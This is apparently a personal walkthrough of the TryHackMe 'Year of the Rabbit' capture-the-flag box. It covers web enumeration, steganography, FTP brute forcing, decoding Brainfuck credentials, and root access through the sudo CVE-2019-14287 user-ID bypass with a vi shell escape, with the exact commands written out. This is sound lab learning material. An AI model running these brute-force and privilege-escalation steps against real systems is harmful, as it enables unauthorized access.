THM - Year of the Rabbit
Introduction
Can you hack into the Year of the Rabbit box without falling down a hole?
This is an easy rated box, and I’m a bit concerned that it’s an easy exploit hidden behind some annoyingly difficult to find folder on a website; we’ll see if that’s true.
nmap
So this one has FTP, SSH and HTTP on port 80. There is no anonymous login on the FTP. It’s running vsftpd 3.0.2, which isn’t apparently a vulnerable version.
Webserver
The webserver is just showing the default apache page, so we’ll try a basic gobuster with the dirb ‘big’ wordlist; we quickly find a folder called /assets. This contains two files:
[VID] RickRolled.mp4 2020-01-23 00:34 384M
[TXT] style.css 2020-01-23 00:34 2.9K
The style.css file contains a link to /sup3r_s3cr3t_fl4g.php, which in turns links to Never Gonna Give You Up on Youtube.
There is also a message:
This is happening whether you like it or not… The hint is in the video. If you’re stuck here then you’re just going to have to bite the bullet!
We can download the RickRolled video file, and about 1 minute in the audio fades and a voice says that you’re ‘looking in the wrong place’. So presumably the /assets directory was one of the ‘rabbit holes’.
Burp Suite
One of the nice things about Burp Suite is the ‘target’ tab, where it collates a list of links on the host. When we take a look there we can find this:
http://10.10.172.98/intermediary.php?hidden_directory=/WExYY2Cv-qU
Presumably this link was hit when we followed the sup3r_s3cr3t_fl4g.php link earlier.
Going there reveals a picture:
http://10.10.172.98/WExYY2Cv-qU/Hot_Babe.png
Stego
Ahhh my favourite, stego. I often find myself referring back to this for these CTF stego things. In this case:
root@kali:/opt/tryhackme/rabbit# zsteg -a Hot_Babe.png
[?] 1244 bytes of extra data after image end (IEND), offset = 0x73ae7
extradata:0 .. text: "Ot9RrG7h2~24?\nEh, you've earned this. Username for FTP is ftpuser\nOne of these is the password:\nMou+56n%QK8sr\n1618B0AUshw1M\nA56IpIl%1s02u\nvTFbDzX9&Nmu?\nFfF~sfu^UQZmT\n8FF?iKO27b~V0\nua4W~2-@y7dE$\n3j39aMQQ7xFXT\nWb4--CTc4ww*-\nu6oY9?nHv84D&\n0iBp4W69Gr_Yf\nTS*%miyPsGV54\nC77O3FIy0c0sd\nO14xEhgg0Hxz1\n5dpv#Pr$wqH7F\n1G8Ucoce1+gS5\n0plnI%f0~Jw71\n0kLoLzfhqq8u&\nkS9pn5yiFGj6d\nzeff4#!b5Ib_n\nrNT4E4SHDGBkl\nKKH5zy23+S0@B\n3r6PHtM4NzJjE\ngm0!!EC1A0I2?\nHPHr!j00RaDEi\n7N+J9BYSp4uaY\nPYKt-ebvtmWoC\n3TN%cD_E6zm*s\neo?@c!ly3&=0Z\nnR8&FXz$ZPelN\neE4Mu53UkKHx#\n86?004F9!o49d\nSNGY0JjA5@0EE\ntrm64++JZ7R6E\n3zJuGL~8KmiK^\nCR-ItthsH%9du\nyP9kft386bB8G\nA-*eE3L@!4W5o\nGoM^$82l&GA5D\n1t$4$g$I+V_BH\n0XxpTd90Vt8OL\nj0CN?Z#8Bp69_\nG#h~9@5E5QA5l\nDRWNM7auXF7@j\nFw!if_=kk7Oqz\n92d5r$uyw!vaE\nc-AA7a2u!W2*?\nzy8z3kBi#2e36\nJ5%2Hn+7I6QLt\ngL$2fmgnq8vI*\nEtb?i?Kj4R=QM\n7CabD7kwY7=ri\n4uaIRX~-cY6K4\nkY1oxscv4EB2d\nk32?3^x1ex7#o\nep4IPQ_=ku@V8\ntQxFJ909rd1y2\n5L6kpPR5E2Msn\n65NX66Wv~oFP2\nLRAQ@zcBphn!1\nV4bt3*58Z32Xe\nki^t!+uqB?DyI\n5iez1wGXKfPKQ\nnJ90XzX&AnF5v\n7EiMd5!r%=18c\nwYyx6Eq-T^9\#@\nyT2o$2exo~UdW\nZuI-8!JyI6iRS\nPTKM6RsLWZ1&^\n3O$oC~%XUlRO@\nKW3fjzWpUGHSW\nnTzl5f=9eS&*W\nWS9x0ZF=x1%8z\nSr4*E4NT5fOhS\nhLR3xQV*gHYuC\n4P3QgF5kflszS\nNIZ2D%d58*v@R\n0rJ7p%6Axm05K\n94rU30Zx45z5c\nVi^Qf+u%0*q_S\n1Fvdp&bNl3#&l\nzLH%Ot0Bw&c%9\n"
imagedata .. text: "*>7%OF\" "
b3,r,msb,xy .. text: "@OXa|j1F"
b3,b,msb,xy .. text: "e0\n5@m0gMm"
**snip**So we’ve got an FTP user name and a bunch of potential passwords (about 80 of them).
FTPBruter
I put the passwords into a file called plist.txt and ran it through FTPBruter:
[i] FTPBruter - A FTP server Brute forcing tool written in Python 3
Author: https://GitHackTools.blogspot.com
[-] Enter the target address: 10.10.172.98
[?] Do you want to use username list? [Y/n]: n
[-] Enter username: ftpuser
[-] Enter the path of wordlisplist.txt
[i] Brute force is performing...
[i] Brute force has done!
Username : ftpuser
Password : 5iez1wGXKfPKQ
[i] Press Ctrl+C to exit right now!FTP
We’ve got one file:
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jan 23 2020 .
drwxr-xr-x 2 0 0 4096 Jan 23 2020 ..
-rw-r--r-- 1 0 0 758 Jan 23 2020 Elis_Creds.txt
226 Directory send OK.When we get the file, it’s BrainF*** code. Um….yeah.
BF
We can paste the code into this site and extract the credentials:
User: eli
Password: DSpDiM1wAEwidSSH
So these are SSH creds for eli, and when we log in we see this:
1 new message Message from Root to Gwendoline:
“Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I’ve left you a hidden message there”
END MESSAGE
When we cat /etc/passwd, we can see there is indeed a user called gwendoline, and it seems like we need to find a message left for her.
Search by date
No doubt there are a few ways to find this, but looking around we can see that many of the files were created on Jan 23 2020, so let’s search for that:
eli@year-of-the-rabbit:/$ find . -type f -ls 2>/dev/null | grep 'Jan 23'Bingo!
36980 4 -rw-r--r-- 1 root root 138 Jan 23 2020 ./usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!What does it say?
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
So with this information we can su as gwendoline.
Gwendoline
Running sudo -l we can see this:
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txtThe version of sudo we have is 1.8.10p3, which is vulnerable to CVE-2019-14287 and that means we can do this:
gwendoline@year-of-the-rabbit:/etc$ sudo -u \#$((0xffffffff)) /usr/bin/vi /home/gwendoline/user.txtAnd once we’re in vi, we can do :!/bin/sh - and we’ve got a root shell.